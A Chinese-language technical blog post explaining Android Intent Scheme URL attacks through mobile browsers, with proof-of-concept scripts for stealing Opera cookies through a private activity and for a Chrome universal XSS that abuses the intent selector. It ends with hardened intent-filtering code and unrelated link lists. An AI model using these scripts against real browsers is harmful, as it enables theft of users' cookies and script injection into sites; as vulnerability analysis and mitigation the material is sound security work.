0x0 引言

我们知道,在Android上的Intent-based攻击非常普遍。这样的攻击轻则导致应用程序崩溃。重则可能演变提权漏洞。当然,通过静态特征匹配,Intent-Based的恶意样本还是非常easy被识别出来的。

然而近期出现了一种基于Android Browser的攻击手段——Intent Scheme URLs攻击。这样的攻击方式利用了浏览器保护措施的不足,通过浏览器作为桥梁间接实现Intend-Based攻击。

相比于普通Intend-Based攻击,这样的方式极具隐蔽性,并且因为恶意代码隐藏WebPage中。传统的特征匹配全然不起作用。除此之外,这样的攻击还能直接訪问跟浏览器自身的组件(不管是公开还是私有)和私有文件,比方cookie文件。进而导致用户机密信息的泄露。

0x1 Intent scheme URL的使用方法

看一下Intent Scheme URL的使用方法。

<script>location.href = “intent:mydata#Intent;action=myaction;type=text/plain;end”</script>

从使用方法上看,还是非常好理解的,这里的代码等价于例如以下Java代码:

Intent intent = new Intent(“myaction”);
intent.setData(Uri.parse(“mydata”));
intent.setType(“text/plain”);

再看一个样例:

intent://foobar/#Intent;action=myaction;type=text/plain;S.xyz=123;i.abc=678;end

上面的语句,等价于例如以下Java代码:

Intent intent = new Intent(“myaction”);
intent.setData(Uri.pase(“//foobar/”));
intent.putExtra(“xyz”, “123”);
intent.putExtra(“abc”, 678);

当中S代表String类型的key-value,i代表int类型的key-value。

源代码中提供了Intent.parseUri(String uri)静态方法,通过这种方法能够直接解析uri,假设想更一步了解当中的语法,能够查看官方源代码。

0x2 Intent scheme URI的解析及过滤

假设浏览器支持Intent Scheme URI语法。通常会分三个步骤进行处理:

  1. 利用Intent.parseUri解析uri,获取原始的intent对象。
  2. 对intent对象设置过滤规则。不同的浏览器有不同的策略。后面会具体介绍。
  3. 通过Context.startActivityIfNeeded或者Context.startActivity发送intent;

当中步骤2起关键作用,过滤规则缺失或者存在缺陷都会导致Intent Schem URL攻击。

以下是各大浏览器对Intent scheme URL的支持情况

可见,除了Firefox外其它的浏览器都支持Intent Scheme URL语法。

0x3 攻击演示样例

a.Opera mobile之cookie盗取

Opera上的intent过滤策略是全然缺失的,因此我们能够轻易调用Opera上的私有activity。比方以下这个攻击演示样例:

<script>
location.href = “intent:#Intent;S.url=file:///data/data/com.opera.browser/app_opera/cookies;component=com.opera.browser/com.admarvel.android.ads.AdMarvelActivity;end”;
</script>

通过上面的脚本,我们能够直接调起AdMarvelActivity。AdMarvelActvity会从intent中获取url。并以HTML/JavaScript的方式解析cookies文件。

试想一下,假设我们预先构造一个恶意站点,并让用户通过浏览器訪问。

这时在恶意见面中,存在例如以下脚本:

<script>
document.cookie = “x=<script>(javascript code)</scr” + “ipt>; path=/blah; expires=Tue, 01-Jan-2030 00:00:00 GMT”;
location.href = “intent:#Intent;S.url=file:///data/data/com.opera.browser/app_opera/cookies;component=com.opera.browser/com.admarvel.android.ads.AdMarvelActivity;end”;
</script>

当AdMarvelActivity解析cookies文件时,就会运行playload。

b.Chrome之UXSS

Chrome的UXSS漏洞利用相对复杂。介绍之前。我们须要先了解一下关于Intent Selector的使用方法。详情见。简而言之。Intent Selector机制提供一种main intent不匹配的情况下能够设置替补的方案。

比方A是main intent, B是A的selector
intent,当startActiviy时,系统发现A无法匹配则会尝试用B去匹配。

Chrome相比于Opera,在intent过滤的步骤中加入了安全策略。代码例如以下:

Intent intent = Intent.parseUri(uri);
intent.addCategory(“android.intent.category.BROWSABLE”);
intent.setComponent(null);
context.startActivityIfNeeded(intent, -1);

从代码中。能够看到Chrome为了防御Intent Based攻击,做了不少限制。比方把category强置为”android.intent.category.BROWSABLE”,把component强置为null,相对之后比Opera强多了。然而。Chrome忽略了Intent
Selector的使用方法,比方以下的使用方法:

intent:#Intent;S.xxx=123; SEL;component=com.android.chrome/.xyz;end

留意当中的keyword“SEL”,事实上就是设置了一个component为com.android.chrome/.xyz的 selector intent,这样的使用方法导致chrome的防御措施形同虚设。最后看一下Chrome UXSS的PoC:

<script>
//通过WebAppActivity0我们先打开一个攻击的网站
location.href = "intent:#Intent;S.webapp_url=http://victim.example.jp;l.webapp_id=0;SEL;compo nent=com.android.chrome/com.google.android.apps.chrome.webapps.WebappActivity0;end";
// 停留2s或者更长时间, 然后注入javascript payload
setTimeout(function() {
location.href = "intent:#Intent;S.webapp_url=javascript:(malicious javascript code);l.webapp_id=1;SEL;component=com.android.chrome/com.google.android.apps.chrome.webapps.WebappActivity0;end";
}, 2000);
</script>

这里的关键点是WebappActivity0对new intent的处理方式上。

第一次打开网站。并完毕载入。

第二次则是直接把javascript payload注入到目标网页。这个漏洞存在于在全部低于v.30.0.1599.92的chrome版本号。而新版本号改动WebappActivity对new intent的处理方式,会创建new tab,这样就避免了javascript inject。

然而在新版中,依旧没有屏避intent selector的使用。因此依旧存在Chrome的私有组件和文件被读取的安全隐患。

0x4 结论

通过上两个漏洞的描写叙述,我们总结得出一种相对照较安全的Intent Filter方法,代码例如以下:

// convert intent scheme URL to intent object
Intent intent = Intent.parseUri(uri);
// forbid launching activities without BROWSABLE category
intent.addCategory("android.intent.category.BROWSABLE");
// forbid explicit call
intent.setComponent(null);
// forbid intent with selector intent
intent.setSelector(null);
// start the activity by the intent
context.startActivityIfNeeded(intent, -1);


Android Intent Scheme URLs攻击的更多相关文章

  1. Android安全之Intent Scheme Url攻击

    0X01 前言 Intent scheme url是一种用于在web页面中启动终端app activity的特殊URL,在针对intent scheme URL攻击大爆发之前,很多android的浏览 ...

  2. android Intent介绍

    Android中提供了Intent机制来协助应用间的交互与通讯,Intent负责对应用中一次操作的动作.动作涉及数据.附加数据进行描述,Android则根据此Intent的描述,负责找到对应的组件,将 ...

  3. android intent和intent action大全

    1.Intent的用法:(1)用Action跳转1,使用Action跳转,如果有一个程序的AndroidManifest.xml中的某一个 Activity的IntentFilter段中 定义了包含了 ...

  4. Android Intent (可通过URL启动 Activity)

    Intent分为两大类: (1)显性的(Explicit) (2)隐性的(Implicit) 对于隐性意图,在某些时候, 应用程序只是想启动具有某种特征的组件, 并不想和某个特定的组件耦合. 使用In ...

  5. [Android] Intent详解

    [转]http://www.cnblogs.com/engine1984/p/4146621.html [正文] Intent组件虽然不是四大组件,但却是连接四大组件的桥梁,学习好这个知识,也非常的重 ...

  6. android intent 隐式意图和显示意图(activity跳转)

    android中的意图有显示意图和隐式意图两种, 显示意图要求必须知道被激活组件的包和class 隐式意图只需要知道跳转activity的动作和数据,就可以激活对应的组件 A 主activity  B ...

  7. Android Intent简介

    Intent对象主要用来在Android程序的Activity,Service和BroadcastReceiver这3大组件之间传输数据,而针对这3大组件,有独立的Intent传输机制,分别如下:1. ...

  8. Android Intent的花样启动

    刚开始看郭大神的<>,实现以下里面的一些例子.Intent的花样启动 显示Intent的使用. 实例化一个Intent,并且制定当前的activity和要跳转到的activity Inte ...

  9. Android Intent机制与常见的用法

    Activity Android于.Activity所有的程序都是必不可少,程都执行在Activity之中.Activity具有自己的生命周期(见http://www.cnblogs.com/feis ...

随机推荐

  1. 如何解决 SQL Server 中的锁升级所致的阻塞问题

    概要 锁升级为表锁插入转换很多细粒度的锁 (如行或页锁) 的过程.Microsoft SQL Server 动态确定何时执行锁升级.作出决定之前,SQL Server 将特定的扫描,整个事务,并且用于 ...

  2. Hive分析窗体函数之LAG,LEAD,FIRST_VALUE和LAST_VALUE

    环境信息:Hive版本号为apache-hive-0.14.0-binHadoop版本号为hadoop-2.6.0Tez版本号为tez-0.7.0 创建表: ),第三个參数为默认值(当往上第n行为NU ...

  3. MySQL的IFNULL函数

    MySQL函数里有一个很有用的函数IFNULL,它的形式是IFNULL(fieldA,fieldB),意义是当字段fieldA是NULL时取fieldB,不是NULL时取fieldA的值. 这个函数与 ...

  4. JDBC二查询(web基础学习笔记八)

    一.建立数据库 --创建news表空间 CREATE TABLESPACE tbs_news DATAFILE 'F:\ORACLE\news.dbf' SIZE 10M AUTOEXTEND ON; ...

  5. windows下npm默认的全局路径

    C:\Users\用户名\AppData\Roaming\npm\node_modules

  6. shell中如何取括号中的字符

    1. 使用grep(结果带括号,不知道有没有办法仅把括号中的内容匹配出来) $a='abc[edg]adfirpqu' $echo $a|grep -o '\[.*\]' #中括号的处理需要转义 [e ...

  7. jsp中的js嵌入Extjs与后台action交互

    近期做前台须要和后台交互数据,直接使用js一直没实现.最后使用extjs实现了,extjs代码直接嵌入到jsp的js代码中就可以(0跟jsp里使用extjs一样,须要载入extjs的几个文件) < ...

  8. 算法笔记_209:第六届蓝桥杯软件类决赛部分真题(Java语言B组)

    目录 1 分机号 2 五星填数 3 表格计算 前言:以下代码仅供参考,若有错误欢迎指正哦~ 1 分机号 标题:分机号 X老板脾气古怪,他们公司的电话分机号都是3位数,老板规定,所有号码必须是降序排列, ...

  9. java指令备忘

    javap  查看class文件用 指令码 助记符 说明 0x00 nop 什么都不做 0x01 aconst_null 将null推送至栈顶 0x02 iconst_m1 将int型-1推送至栈顶 ...

  10. openerp many2many

    many2many (0,0,{values}) 根据values里面的信息新建一个记录. (1,ID,{values})更新id=ID的记录(写入values里面的数据) (2,ID) 删除id=I ...